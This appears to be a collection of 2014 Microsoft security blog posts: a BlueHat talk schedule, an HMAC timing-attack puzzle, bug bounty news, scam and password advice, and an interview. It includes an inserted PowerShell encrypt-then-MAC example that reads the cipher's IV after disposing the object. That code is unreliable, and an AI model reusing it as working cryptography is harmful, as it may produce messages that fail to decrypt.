We are very excited about the interaction between Microsoft engineers and the other top security experts who are coming to speak at the event. Here is a list of their talks:

*Please note that this schedule is subject to change.

October 9th, 2014

9:00 AM – 9:40 AM: Chris Betz

9:40 AM – 10:20 AM: Stefano Zanero
Botintime – Phoenix: DGA-based Botnet Tracking and Intelligence
It’s common knowledge that an automatically generated malicious domain will not become popular, and also that an attacker will register a domain with a top-level domain that does not require clearance. Hence, we use Phoenix, which filters out domains likely to be generated by humans. The core of Phoenix is its ability to separate DGA from non-DGA domains, using linguistic features.

10:20 AM – 10:35 AM: Break

10:35 AM – 11:15 AM: Scott Longheyer
Government Snooping Potentially Now Constitutes an Advanced Persistent Threat
Security is the application of Privacy’s intentions, so open the pocketbook and check your ciphers. Gain a deeper understanding of Microsoft’s position on privacy and how online services intend to protect customer data.

11:15 AM – 11:55 AM: Stefano Zanero
Jackdaw talk – Automatic Malware Behavior Extraction and Tagging
This talk will focus on our approach for extracting (interesting) behavior specifications in an automatic way from a large collection of (untagged) malware. If you wonder why, it’s because we believe in giving support to the analyst by providing a list of important behaviors, with a rough explanation, to prioritize the analysis.

11:55 AM – 12:55 PM

12:55 PM – 1:15 PM: Xeno Kovah
UEFI – What would it take to enable global firmware vulnerability & integrity checking?
This talk will describe what actions are being taken to improve security for PC firmware, and what different groups in Microsoft can do to help.

1:15 PM – 1:35 PM: Yuriy Bulygin
UEFI – Summary of Attacks against BIOS and Secure Boot
A variety of attacks targeting platform firmware have been discussed publicly, drawing attention to the pre-boot and firmware components of the platform such as BIOS and SMM, UEFI secure boot and Full Disk Encryption solutions. This talk will detail and organize some of the attacks and how they work. We will cover attacks against BIOS write protection, attacks leveraging hardware configuration against SMM memory protections, attacks using vulnerabilities in SMI handlers, attacks against BIOS update implementations, attacks bypassing secure boot, and various other issues. We will describe underlying vulnerabilities and how to assess systems for these issues. After watching, you should understand how these attacks work, how they are mitigated, and how to verify if your system has any of these problems.

1:35 PM – 2:15 PM: Josh Thomas
Behind the NDA: How to attack a product under deadline
This talk will focus on a brief security assessment of the Windows Phone / Nokia Lumia platforms with the intent of exploring attack methodologies. This talk will focus on how we as consultants approach a new problem / technology and how we can quickly become productive on new and previously unknown / unexplored hardware and software components.

2:15 PM – 2:35 PM: Sergey Bratus, Julian Bangert
Defining and Enforcing Intent Semantics at ABI level
Dominant OS security policy designs treat a process as an opaque entity that has a "bag" of permissions to access some OS resources at any time, in any order. Now that the sensitive data that we most want to protect may never touch the filesystem or even cross a process boundary, these designs fail at their purpose. We introduce a design that has a much higher granularity of protection, yet is compatible with existing ABI, standard build chains, and binary utilities.

2:35 PM – 2:50 PM

2:50 PM – 3:30 PM: Andrew Ruef
Build It Break It Competition
We created a competition where students design and implement secure programs, and identify bugs in each other’s programs. We’ll talk about the design of the competition, the data we’ve gathered from executing the competition, our plans for future competitions, and what the data is telling us about software security, programming languages, education, and software development.

3:30 PM – 4:10 PM: Ram Shankar Siva Kumar, John Walton
Subverting machine learning detections for fun and profit
If you are using machine learning in your feature, it can be attacked! This talk is a primer on adversarial machine learning wherein we show how attackers can manipulate machine learning systems to get the result they want you to see. You will learn how to protect yourself and detect such attacks. You don’t need to know about machine learning to attend this talk – we’ve got you covered.

4:10 PM – 4:40 PM: Lightning Talks

October 10th, 2014

9:00 AM – 10:00 AM: Lightning Talks & Breakfast

10:00 AM – 10:40 AM: Benjamin Delpy, Chris Campbell, Skip Duckwall
The Attacker's View of Windows Authentication and Post Exploitation part 1
This talk will focus on how Windows authentication works in the real world and what the popular attacks against it are. You will learn the thought process of attackers in the real world and how it differs from a defender’s perspective. We’ll also cover post-exploitation tools and techniques such as Mimikatz. Finally, we’ll discuss next steps: how do you design services that are breach-resistant and make authentication harder to crack?

10:40 AM – 11:20 AM: Benjamin Delpy, Chris Campbell, Skip Duckwall
The Attacker's View of Windows Authentication and Post Exploitation part 2

11:20 AM – 11:35 AM

11:35 AM – 12:15 PM: Ho John Lee
Privacy and Security in a Personalized Services World
An introduction and discussion of current policy issues around personalized mobile and cloud-based knowledge services. In this talk you will learn about some of the privacy and policy issues associated with large scale, cloud based personalization that are different from those in web search, email, or social networks. I will also present some concepts and patterns for building mobile and personalized services that honor individual user data obligations while also enabling offline data analysis and global, low latency serving infrastructure.

12:15 PM – 12:55 PM: Bo Qu
The failure and success in IE fuzzing
The road to success is often paved with failure. In this presentation we will discuss the mistakes and challenges we overcame while developing our fuzzer that has successfully discovered over 100 vulnerabilities in Internet Explorer. Welcome to the school of hard knocks!

12:55 PM – 1:55 PM

1:55 PM – 2:35 PM: John Walton
Next Generation Advanced Persistent Threat™
What will tomorrow’s threat landscape look like? How can attacks become even more advanced than we are observing today? What will the adversary’s arsenal contain? The Next Generation Advanced Persistent Threat™ talk will peer into the future and these exact questions. Come discover how we will continue to be outmaneuvered during every phase of the cyber kill chain.

2:35 PM – 2:55 PM: David Finn
Fighting Cybercrime with Big Data
The Microsoft Digital Crimes Unit (“DCU”) is a team of about 100 people, including former prosecutors, law enforcement officials, security analysts, investigators, attorneys, and intelligence analysts, dedicated to the fight against global cybercrime. In this presentation about DCU’s CSI-like blend of crime fighting and technology, find out how Big Data and analytics are revolutionizing everything DCU does – helping protect internet users, and disrupting and dismantling criminal organizations all over the world.

2:55 PM – 3:10 PM

3:10 PM – 3:30 PM: Alexandra Savelieva, Daniel Eshner, Nuwan Ginige, Mohammad Usman
Data Isolation In Multitenant Cloud Environment
In our talk, you’ll learn about a new solution that we built to address the problem of managing access to data across various fabrics and processing environments to mitigate top security threats of a cloud-based distributed application platform shared by multiple partners, including isolation of mutually distrustful tenant applications running side-by-side on a commodity server.

3:30 PM – 4:30 PM: Daniel Edwards
Engineer's guide to DDOS
Are you ready to discuss DDoS? Can your online service be weaponized to attack? It’s already happened to others. Is yours next?

Vuln Hunt: Find the Security Vulnerability Challenge #1, 02 Oct 2014 16:19:18 +0000

Whether it’s a riddle, puzzle, or detective mystery novel, most of us like to solve a good brain teaser. As security and program experts, these types of conundrums keep us on our toes. During the next few weeks, I’ll share some of my favorites, and see if you can find the security vulnerability. For this first one, let’s take a look at authenticated encryption. Two points are possible for solving this stumper, plus an extra bonus point. Question:


First off, let’s give one point to the programmer, who realized that many encryption algorithms do not in themselves provide any integrity protection.

Encryption prevents an eavesdropper “Eve” from reading the message that Alice sends to Bob, but contrary to popular belief, it does not prevent Eve from intercepting and tampering with that message. (There are notable exceptions such as Galois/Counter Mode (GCM) and Counter with CBC-MAC (CCM) encryption modes, but for the purposes of this question we will assume that a non-authenticated encryption mode such as Cipher-block Chaining (CBC) was used.)

We also give a point to the programmer for using an encrypt-then-MAC design.

Alternative approaches (MAC-then-encrypt and encrypt-and-MAC) are extremely dangerous and have led to several serious security vulnerabilities: read Moxie Marlinspike’s blog post on the “Cryptographic Doom Principle” if you’d like to delve deeper. Give yourself a point if you realized that an encrypt-then-MAC approach is not a security bug.

However, although the programmer correctly validates the HMAC before decrypting, he does so a byte at a time and returns false as soon as he gets a mismatched byte. This means that a tampered HMAC value will fail slightly faster if the first byte is wrong than if the first byte is right, and the same holds for every later byte. A persistent attacker may be able to exploit this timing difference to craft a valid HMAC for a tampered message. Give yourself a point if you found this timing attack vulnerability in the for-loop.

Finally, although it’s not a security “bug” per se, give yourself a bonus point if you noted that this code uses hardcoded cryptographic algorithms and is therefore not cryptographically agile.

All crypto weakens over time, and while HMAC-SHA256 is considered a strong algorithm now, that may change in the future (and perhaps suddenly). You should plan for this eventuality now and avoid hardcoding cryptographic algorithms into your code: see “Cryptographic Agility” for more details.
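The three lessons of this challenge written out as working code, as an added example that is not the challenge’s code (which is not reproduced here): encrypt-then-MAC over AES-CBC, a tag comparison with no early exit, and a MAC algorithm that is named in the message instead of hard-coded. The message format, function names and the fixed demo keys are my assumptions.

```powershell
# Table of supported MAC algorithms and their tag sizes. Rotating to a new algorithm is a
# table entry plus a new name in the message header; callers never name an algorithm.
$MacTagBytes = @{ HMACSHA256 = 32; HMACSHA512 = 64 }

function Compare-FixedTime {
    # Compare two byte arrays without an early exit: OR together every byte difference and
    # only inspect the result at the end, so timing does not depend on where they differ.
    # (The length check is fine to short-circuit: the tag length is public.)
    param([byte[]]$A, [byte[]]$B)
    if ($A.Length -ne $B.Length) { return $false }
    [int]$diff = 0
    for ($i = 0; $i -lt $A.Length; $i++) { $diff = $diff -bor ($A[$i] -bxor $B[$i]) }
    return ($diff -eq 0)
}

function New-Mac {
    # Instantiate the MAC by name through the .NET type system (System.Security.Cryptography.*).
    param([string]$Algorithm, [byte[]]$Key, [byte[]]$Data)
    if (-not $MacTagBytes.ContainsKey($Algorithm)) { throw "Unsupported MAC algorithm '$Algorithm'" }
    $mac = New-Object "System.Security.Cryptography.$Algorithm"
    $mac.Key = $Key
    try { return $mac.ComputeHash($Data) } finally { $mac.Dispose() }
}

function Protect-Message {
    # Encrypt-then-MAC. Layout: header(16, MAC name) || IV(16) || AES-CBC ciphertext || tag.
    param([byte[]]$EncKey, [byte[]]$MacKey, [byte[]]$Plaintext, [string]$MacAlgorithm = 'HMACSHA256')
    $aes = [System.Security.Cryptography.Aes]::Create()     # CBC with PKCS7 padding by default
    $aes.Key = $EncKey
    $aes.GenerateIV()
    $enc = $aes.CreateEncryptor()
    $ct = $enc.TransformFinalBlock($Plaintext, 0, $Plaintext.Length)
    $aes.Dispose()
    $header = [System.Text.Encoding]::ASCII.GetBytes($MacAlgorithm.PadRight(16))   # names <= 16 chars
    $body = $header + $aes.IV + $ct
    $tag = New-Mac $MacAlgorithm $MacKey ([byte[]]$body)      # tag covers header and IV too
    return [byte[]]($body + $tag)
}

function Unprotect-Message {
    # Verify the tag over everything before touching the ciphertext; $null on any failure.
    param([byte[]]$EncKey, [byte[]]$MacKey, [byte[]]$Message)
    if ($Message.Length -lt 32) { return $null }
    $algorithm = [System.Text.Encoding]::ASCII.GetString($Message, 0, 16).Trim()
    if (-not $MacTagBytes.ContainsKey($algorithm)) { return $null }   # unknown or retired MAC
    $bodyLen = $Message.Length - $MacTagBytes[$algorithm]
    if ($bodyLen -lt 48) { return $null }                     # header + IV + at least one block
    $body = [byte[]]$Message[0..($bodyLen - 1)]
    $tag  = [byte[]]$Message[$bodyLen..($Message.Length - 1)]
    $expected = New-Mac $algorithm $MacKey $body
    if (-not (Compare-FixedTime $expected $tag)) { return $null }
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $EncKey
    $aes.IV  = [byte[]]$Message[16..31]
    $ct = [byte[]]$Message[32..($bodyLen - 1)]
    $dec = $aes.CreateDecryptor()
    try { return $dec.TransformFinalBlock($ct, 0, $ct.Length) } finally { $aes.Dispose() }
}

# Constructed demo keys (fixed bytes for reproducibility only; generate real keys from a CSPRNG).
$encKey = [byte[]](1..32)
$macKey = [byte[]](101..132)

$msg = Protect-Message $encKey $macKey ([System.Text.Encoding]::UTF8.GetBytes('transfer 10 to Bob'))
$roundTrip = [System.Text.Encoding]::UTF8.GetString([byte[]](Unprotect-Message $encKey $macKey $msg))

# Flip one ciphertext byte: the tag check fails and nothing is decrypted.
$tampered = [byte[]]$msg.Clone()
$tampered[40] = $tampered[40] -bxor 1
$rejected = $null -eq (Unprotect-Message $encKey $macKey $tampered)

"round trip ok: $($roundTrip -eq 'transfer 10 to Bob'); tampered message rejected: $rejected"
```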

While finding a solution can be entertaining, it can also be serious business when it comes to security. For us, the goal is to provide even greater protection for data across all the great Microsoft services you use and depend on every day.

Next week, we’ll take a look at regular expressions.

Vuln Hunt: Find the Security Vulnerability Challenge, 25 Sep 2014 18:15:54 +0000

There’s a saying that many people have heard: “If it was a snake, it would have bitten you.” More often than not, that’s the case with software vulnerabilities. A security class bug can often be so subtle in a program that human reviews, static code analysis and other sophisticated tools might not find it. Yet at the same time, finding that vulnerability can be critical, especially if it is exploitable.

During the next several weeks, in our ‘Vuln Hunt: Find the Security Vulnerability Challenge,’ we’ll share a few light-hearted examples from our Microsoft security experts that illustrate how subtle security vulnerabilities can be. Some of the examples they will share can make even the savviest of us take a second look. Let’s see how well you do with our first challenge, which takes a look at authenticated encryption.

If you haven’t already, I also encourage you to check out another great security story, “Life in Digital Crosshairs; the dawn of the Microsoft Security Development Lifecycle.” This story is about the industry-leading Security Development Lifecycle (SDL), which for the past 10 years has been helping public and private organizations change their engineering cultures, develop more secure software, and find where the vulnerabilities may be.

Enjoy the challenge!

Bug Bounty Evolution: Online Services, 23 Sep 2014 10:31:57 +0000

Today marks the next evolution in bounty programs at Microsoft as we launch the Microsoft Online Services Bug Bounty program starting with Office 365. In our mobile first, cloud first world, this is an exciting and logical evolution to our existing bug bounty programs.

Office 365 is the first of our online services groups to launch a bounty for vulnerabilities found in their services and we will bring others into the program as we go forward. For a list of eligible services and program terms, please visit Of course, any vulnerabilities discovered in any Microsoft products or services can and should be reported according to our Coordinated Vulnerability Disclosure guidelines to us by emailing

We also invite you to read the Office 365 blog post, where our colleagues discuss some of what they are hoping to see as a result of this program. Our goal with bounty programs is ultimately unchanged: to uncover issues and protect customers as quickly as possible. As always, partnering with the security research community offers us the broadest way to do that.

Happy Hunting!

Akila Srinivasan

HOW TO: Report the Microsoft phone scam, 18 Sep 2014 08:57:00 +0000 If someone calls you claiming to be from Microsoft technical support and offers to help you fix your computer, mobile phone, or tablet, this is a scam designed to install malicious software on your computer, steal your personal information, or both.

Do not trust unsolicited calls. Do not provide any personal information.

You can report this scam to the following authorities:

Whenever you receive a phone call or see a pop-up window on your PC and feel uncertain whether it is from someone at Microsoft, don’t take the risk. Reach out directly to one of our technical support experts dedicated to helping you at the Microsoft Answer Desk. Or you can simply call us at 1-800-426-9400 or one of our customer service phone numbers for people located around the world.

What to do if your antivirus subscription has expired, 16 Sep 2014 09:00:00 +0000 Phil asks:

I’m new to Windows 8.1. Now that my free security software has expired, how do I go about making Windows Defender my choice security method?

Windows Defender is included with Windows 8 and Windows 8.1 and helps protect your PC against malware (malicious software). Many new computers come with free subscriptions to antivirus software and other security programs from companies other than Microsoft. If the subscription runs out and you don’t want to pay for it, you need to:

  1. Fully uninstall the non-Microsoft security software that came with your computer.
  2. Make sure Windows Defender is turned on.

To uninstall the security software that came with your computer, check the software’s Help file.

Make sure Windows Defender is turned on in Windows 8

  1. Swipe in from the right edge of the screen and tap Search (or if you’re using a mouse, point to the upper-right corner of the screen, move the mouse pointer down, and then click Search).
  2. In the Search box, type Windows Defender.
  3. Tap or click the Windows Defender icon.
  4. Go to Settings, and make sure that Turn on real-time protection (recommended) is selected.
  5. Tap or click Save Changes.

How do digital youth of the "app generation" learn, communicate, and express themselves, 11 Sep 2014 08:58:00 +0000 I recently had the opportunity to speak with Katie Davis, an assistant professor from the University of Washington Information School, to discuss her role and a book she co-authored called The App Generation: How Today’s Youth Navigate Identity, Intimacy, and Imagination in a Digital World.

The University of Washington is the first to have an Information or iSchool focused on youth and technology. Tell us about the school and your students’ focus of study.

Our digital youth faculty teaches a range of courses and provides research experiences for undergraduate, masters, and PhD students. We aim to prepare world-class digital youth researchers, practitioners who work directly with young people, and innovators who design and create digital tools and services for youth. One of the courses I teach, called Youth Development and Information Behavior in a Digital Age, explores new research on the impact of digital media tools and practices on youth development, including academic development.

How did you become interested in writing about kids’ use of technology and, in particular, apps?

My interest began over 10 years ago, when I was a fourth grade teacher. At that time, technology was becoming increasingly central to young people’s lives, both inside and outside of school. As a teacher, it was clear to me that this trend was only going to get bigger. I started to think about the many implications involved with respect to how young people learn, communicate with other people, and express themselves.

I was fortunate that when I came to Harvard as a doctoral student, my advisor and now co-author, Howard Gardner, was starting to ask similar questions. During the course of our research, we came to an important realization: whereas earlier generations have typically been defined by political or economic events (think of the World Wars, the Great Depression, and the Civil Rights Movement), this generation of young people is defined—and, importantly, defines itself—more by the technologies they use. Apps weren’t part of the cultural zeitgeist when we started our research, but as the iPhone was introduced in 2007 and the slogan “there’s an app for that” became a common saying, we realized that apps served as a fitting metaphor for what we were observing in our research. In our book The App Generation, we alternate between referring to apps metaphorically, to illuminate particular themes in our findings, and literally, to explore how teens use various apps like Snapchat, Instagram, Facebook, and Twitter.

What are the benefits of our app-driven lifestyle, and what might be some of the drawbacks?

In the book, we introduce the idea of an app mentality that many of today’s youth seem to exhibit. The app mentality suggests that whatever human beings might desire should be provided by apps. If the app doesn’t exist, it should be devised by someone right away. If no app can be imagined or created, then maybe the desire simply doesn’t or shouldn’t matter.

We see both positive and negative variations on the app mentality. A world permeated by apps is in many ways a terrific one. Apps are great if they take care of ordinary things and free us up to explore new paths and form deeper relationships. They are great also as they increasingly become tools for productive work, offer us ways to stay connected to our friends and family, and even provide us with avenues for new experiences. When apps are used in this way, they are app-enabling.

But there’s a less optimistic view of apps. There’s a danger that we become overly dependent on apps for the answers, for social connection, for our sense of ourselves. There’s a danger that we look to apps before we look inside ourselves. If this happens—if we start to see more of our apps than ourselves in our experiences, actions, self-expressions—it’s our argument that we have become app-dependent.

How can technology foster and enhance our creativity? By the same token, does your research indicate that technology can dampen our artistic abilities?

Digital media can open up new avenues for youth to express themselves creatively. Yet, it’s important to consider the fact that app developers constrain artistic expressions in specific ways. For instance, if you’re using a painting app, your color palette is limited to the hues that the designer programmed into the app. In a music composition app, your tonal range is similarly limited. Of course, sophisticated users can create their own workarounds and break free from the constraints of the underlying code. But realistically, most people will work within the parameters of the original app, and that raises important questions about how such boundaries affect the creative process.

We explored changes in youth creativity over a 20-year time span, analyzing over 350 pieces of visual art produced by high school students and nearly 100 fiction stories written by middle and high school students between 1990 and 2011. Though we were expecting to find that creativity in the visual and literary domains would either rise or fall together, our analysis uncovered a surprisingly divergent pattern. We found that certain dimensions of creativity, such as originality, experimentation, and complexity, have diminished in the literary domain while they’ve increased in the visual domain.

The literary pieces written in recent years tended to be more mundane—there was less experimentation with genre, character types, and setting. Whereas a story from the early 1990s might involve a character who metamorphosed into a butterfly, there was very little such deviation from reality in the more recent pieces. In contrast, the pattern we detected in the visual art was one of increasing experimentation and sophistication. Contemporary artists were more likely to draw on the expansive selection of media at their disposal to create layered works that hold the eye longer with their increased complexity and unexpected composition.

We’ve considered these findings in terms of the role of digital media, though we can only offer our best hypotheses rather than draw a direct connection between technology and changes in youth’s artistic productions. With respect to the visual art findings, we note that digital media provide a wider, easier, and cheaper array of tools for youth to express themselves creatively. In addition, the Internet has expanded access to sources of inspiration as well as opportunities to receive feedback and recognition for one’s artistic productions.

With respect to writing, it’s hard to tell if kids are writing less, but the type of writing they do online is often quick, fleeting, and very much tied to the everyday and mundane. These characteristics mirror the patterns we saw in our analysis of youth’s creative writing. It’s also worth noting, for writing at least, the likely influence of our education system’s increasing focus on standardized testing over the last 20 years. Such a focus rewards writing the perfect five-paragraph essay rather than taking risks in one’s writing.

What surprised you when you started researching and writing your book?

My biggest surprise has been hearing teens express real ambivalence toward digital media and its role in their lives. When I talk with teens, I typically ask them to imagine what it would be like to go through a day (then a week, a month, and longer) without their phones, apps, or social media. The initial reaction is fairly standard: what an unpleasant, hard-to-imagine scenario! They’d be disconnected from their networks of friends and followers on Instagram, Facebook, and Twitter; they’d be unable to conduct research for school; and they’d be deprived of the many sources of entertainment they enjoy online and through apps. After going through the list of what they wouldn’t have or be able to do, many teens start to consider what they might gain: uninterrupted, lengthier face-to-face conversations; more time for personal reflection; fewer distractions when doing homework.

This ambivalence toward technology tells me that youth recognize many of the same opportunities and challenges around their digital media use as adults. I think this recognition is a great entry point for family members, teachers, and others who work with and support youth to engage them in conversations about the positive and negative aspects of technology, and through these conversations help one another to use digital media in an app-enabled way.

What can parents, teachers, coaches, and others do to help raise responsible, tech-savvy consumers?

A good place to start is with our own technology use. We should remember that adults are powerful models for youth. They see us tied to our laptops, smartphones, and tablets, and they’re taking note! We have the opportunity to model moderation in technology use, show kids there’s a time to put these devices away and be fully present.

Adults can also provide app-enabled experiences that emphasize open-ended exploration and personal initiative over more structured, top-down, and constrained activities. We’ve sampled a variety of apps—many of them with an educational bent—during the course of researching and writing The App Generation. Apps like Minecraft, Scratch, and Digicubes seem (unfortunately) to be among the minority that encourage open-ended exploration and creation. Others we’ve sampled are packed with a lot of bells and whistles that have little relation to the purported learning objectives and leave little room for users to exercise their own creativity and initiative.

Finally, we think computational skills should be emphasized to a greater degree in K–12 education so that kids are able to modify apps as they wish, even create their own. This is something that the UW iSchool does very well in its Informatics and Master of Science in Information Management programs. The ability to understand how apps and other technologies work constitutes a new—and critical—literacy for this new digital era.

Should industry be thinking how to design responsible products, services and apps that foster being a good digital citizen?

Yes, I think designers have a responsibility to consider how their apps are likely to be used, for good and bad. Of course, it’s impossible to anticipate all the different ways one’s creation might be used or modified.

My iSchool colleague, Professor Batya Friedman, has pioneered an approach to designing technologies and tools that take into account what humans care about. Called value-sensitive design, this approach seeks to account for the values of both direct and indirect stakeholders in a principled and systematic manner throughout the design process. A value-sensitive design approach encompasses more than digital citizenship. Designers could use such an approach to think about app-enablement vs. app-dependence during the design process, and attempt to design so that users are encouraged to use apps in an open-ended way, as non-constrained as possible.

Get security updates for September 2014, 09 Sep 2014 10:09:00 +0000

Microsoft releases security updates on the second Tuesday of every month.

How to check for the latest updates.

This bulletin announces the release of security updates for Windows, Microsoft Office, and other programs.

To get more information about security updates and other privacy and security issues delivered to your email inbox, sign up for our newsletter.

Get advance notice about September 2014 security updates, 04 Sep 2014 10:09:00 +0000 Today, the Microsoft Security Response Center (MSRC) posted details about the September security updates.

If you have automatic updating turned on, most of these updates will download and install on their own. Sometimes you may need to provide input for Windows Update during an installation. In this case, you’ll see an alert in the notification area at the far right of the taskbar—be sure to click it.

In Windows 8, Windows will turn on automatic updating during setup unless you choose to turn it off. To check this setting and turn on automatic updating, open the Search charm, enter Turn automatic updating on or off, and tap or click Settings to find it.

Learn how to install Windows Updates in Windows 7.

If you are a technical professional

The Microsoft Security Bulletin Advance Notification Service offers details about security updates approximately three business days before they are released. We do this to enable customers (especially IT professionals) to plan for effective deployment of security updates.

Sign up for security notifications

Congratulations! You’ve won $800,000!!, 02 Sep 2014 09:38:00 +0000 Well, maybe not.

But that’s just one of the many ploys that scammers send in their relentless efforts to part people from their money or sensitive personal information like passwords and account numbers.

Microsoft is asking people to take a survey of their experience with online fraud—what kinds of scams they’ve encountered (including those on mobile devices and Facebook), how concerned they are about online or phone fraud, and what steps they take to protect themselves.

In 2012, Microsoft fielded its first such study, interviewing 1,000 US residents to understand their exposure to, and perception of, online fraud and scams.

Respondents reported having encountered roughly eight different scams on average, with these as the top four:

  • Scams that promise free things or coupons (44 percent)
  • Fake antivirus alerts that imitate real programs offering virus repair but that download malware instead (40 percent)
  • Phishing scams using fake messages that mimic those of trusted businesses to trick people into revealing personal information (39 percent)
  • Fraud that features a request for bank information or money upfront from someone (such as a “foreign prince”) who needs help transferring large sums of money for a cut of the total (39 percent)

In the new survey, we’re interested in how scams and responses to scams might have changed since 2012. Are there different scams? What are the most common? Where are they most often occurring—on mobile devices? On Facebook?

Results of our last survey showed that nearly everyone (97 percent) took steps to safeguard their computers, but more than half (52 percent) did nothing at all to protect their mobile devices. So we’re particularly interested to see if these numbers have changed.

You can help us fight online scams and fraud by taking our survey.

We will release the results of the survey during National Cyber Security Awareness Month this October. Follow the hashtag #NCSAM to read the story.

5 passwords you should never use, 29 Aug 2014 09:11:00 +0000 This is part three of three posts on stronger passwords.

Part 1: Create stronger passwords and protect them

Part 2: Do you know your kids’ passwords?

The news is filled with stories about hackers cracking passwords. You can help avoid being a victim by never, ever using these passwords:

  1. Password. Believe it or not, this is still a common password. Don’t use it.
  2. Letmein. We recommend that you use passphrases that are memorable. Just don’t use this one. It ranks high on several lists of the most-used passwords.
  3. Monkey. This common word appears on many lists of popular passwords. It’s also too short. Make passwords at least eight characters—the longer the better.
  4. Your pet’s name. While you’re at it, don’t use any passwords that can be easily guessed, such as the name of your spouse or partner, your nickname, birth date, address, or driver’s license number.
  5. 12345678. Avoid this and other sequences or repeated characters such as 222222, abcdefg, or adjacent letters on your keyboard (such as qwerty).
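As an added example (not code from the original post), here is a Python check that turns the five rules above into a password-policy test: a denylist of the common passwords the post names, a minimum length, detection of repeated characters, ascending or descending sequences, and adjacent keys on a keyboard row. The denylist and keyboard rows are constructed samples, and the `personal_terms` parameter is an assumption used to implement rule 4 (pet name, nickname, birth date and similar caller-supplied facts).

```python
"""Password policy checks built from the five rules in this post.

This is an added example, not code from the original Microsoft post.
"""

# Constructed sample of the common passwords the post names; a real
# deployment would load a much larger breached-password list instead.
COMMON_PASSWORDS = {"password", "letmein", "monkey", "12345678", "qwerty"}

# Keyboard rows used to catch adjacent-key runs such as "qwerty" (constructed,
# US layout only).
KEYBOARD_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890"]

MIN_LENGTH = 8   # the post's "at least eight characters"
RUN_LENGTH = 4   # how many consecutive characters count as a pattern


def _windows(pw):
    """Yield every RUN_LENGTH-character window of the password."""
    for i in range(len(pw) - RUN_LENGTH + 1):
        yield pw[i:i + RUN_LENGTH]


def _is_sequence(chunk):
    """True if every step is +1 or every step is -1 in code points (abcd, 4321)."""
    steps = {ord(b) - ord(a) for a, b in zip(chunk, chunk[1:])}
    return steps == {1} or steps == {-1}


def _is_keyboard_run(chunk):
    """True if the chunk, forwards or backwards, is adjacent keys on one row."""
    return any(chunk in row or chunk[::-1] in row for row in KEYBOARD_ROWS)


def _is_repeat(chunk):
    """True if the whole chunk is one character repeated (2222)."""
    return len(set(chunk)) == 1


def check_password(candidate, personal_terms=()):
    """Return the list of rules the candidate violates; an empty list passes.

    personal_terms is a caller-supplied, hypothetical list of guessable facts
    (pet name, nickname, birth date ...) that rule 4 says must not appear.
    """
    pw = candidate.lower()
    problems = []
    if pw in COMMON_PASSWORDS:                       # rules 1-3, 5 (denylist)
        problems.append("common password")
    if len(pw) < MIN_LENGTH:                         # rule 3 (too short)
        problems.append("shorter than %d characters" % MIN_LENGTH)
    if any(_is_repeat(w) for w in _windows(pw)):     # rule 5 (222222)
        problems.append("repeated characters")
    if any(_is_sequence(w) for w in _windows(pw)):   # rule 5 (abcdefg, 12345678)
        problems.append("sequential characters")
    if any(_is_keyboard_run(w) for w in _windows(pw)):  # rule 5 (qwerty)
        problems.append("adjacent keyboard keys")
    for term in personal_terms:                      # rule 4 (pet's name etc.)
        term = term.lower()
        if len(term) >= 3 and term in pw:
            problems.append("contains personal information: %s" % term)
    return problems


if __name__ == "__main__":
    for sample in ["password", "Monkey", "222222", "qwerty12", "fluffy2014"]:
        print(sample, "->", check_password(sample, ["Fluffy"]))
```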

Bonus password tips

Don’t use the same password for multiple sites. Cybercriminals can steal passwords from websites that have poor security and then use those same passwords to target more secure environments, such as banking websites.

Change your passwords regularly, particularly those that safeguard your computer, important accounts (like email or Facebook), and sensitive information, like financial and health data.

For more password guidance, see Create strong passwords.


SAFECode on Confidence: One Size Does Not Fit All, 23 May 2014 15:00:00 +0000 In a recent post by SAFECode, a non-profit organization of software vendors dedicated to increasing trust in information and communications technology products by improving security and assurance methods, Eric Baize of EMC and Steve Lipner of Microsoft discuss the challenging subject of the trustworthiness of acquired software. How a customer gains confidence in acquired software is a question developers are frequently asked. The latest SAFECode blog discusses three approaches that a customer can use to assess the security of acquired software, each giving a different level of confidence.

BlueHat v13 is Coming, 06 Dec 2013 15:34:00 +0000 Next week, starting Thursday, we’ll be hosting our 13th edition of BlueHat. I’m always so impressed with the level of knowledge we attract to each BlueHat, and while the event is invite-only, we’ll be sharing glimpses into the event via this blog and the hashtag #BlueHat.

For each of the past six years I have had the honor to work among some of the most talented engineers I have ever met, here at Microsoft. I am inspired by the mission we embrace in securing our products, devices, and services. There are few other vantage points with as broad a footprint on the internet, since one of Microsoft’s early mottos helped put “a computer in every home.” Our job in the Microsoft Security Response Center (MSRC) is to help protect the customers who use the technology that the rest of the company works so hard to create. In everything we do in the MSRC, we strive to fulfill our mission to help ensure the security and privacy of over a billion computer systems and our customers worldwide.

In 2005, we started the BlueHat conference to educate the developers and executives of Microsoft about current and emerging threats. The idea was to bring the hackers and security researchers to us, and in doing so foster an environment where the bidirectional exchange of ideas around the balance between security and functionality could meet fertile ground in the famed “hallway track.” We hand-pick just a small number of speakers and external attendees so that we can concentrate on learning from them and, in turn, have the chance to teach some of them what we have learned, to help enhance the security and privacy of the Internet as a whole.

This year is no different in that we have invited speakers chosen to educate, amaze, and work with Microsoft to help us understand the emerging security threats to us and our customers. Together, we will rise to face the most important challenges in helping to secure the global Internet ecosystem.

On Dec 12, 2013, we’ll open this year’s BlueHat by focusing on the threat landscape, learning about determined adversaries to help us defend our own network and assets, and about tools to detect and mitigate attacks. Next we’ll welcome some of the world’s top experts to discuss devices and services, from low-level hardware to web services, to help us build products, devices, and services that are more secure from the ground up.

Finally, we’ll close out the conference with a thought-provoking track that I like to call the “Persistence of Trust,” where we will discuss the core elements that comprise the trust we rely on to support what the Internet has become – a global information sharing network that humanity uses to exchange goods, services, money, and most importantly, ideas. To support these functions, we must strengthen the technology that underlies and supports that trust, and we must design products, devices, and services that are resistant to security and privacy breaches. 

Here’s a quick overview of the planned speaker lineup for the two days of BlueHat v13.

Day 1: Thursday, December 12

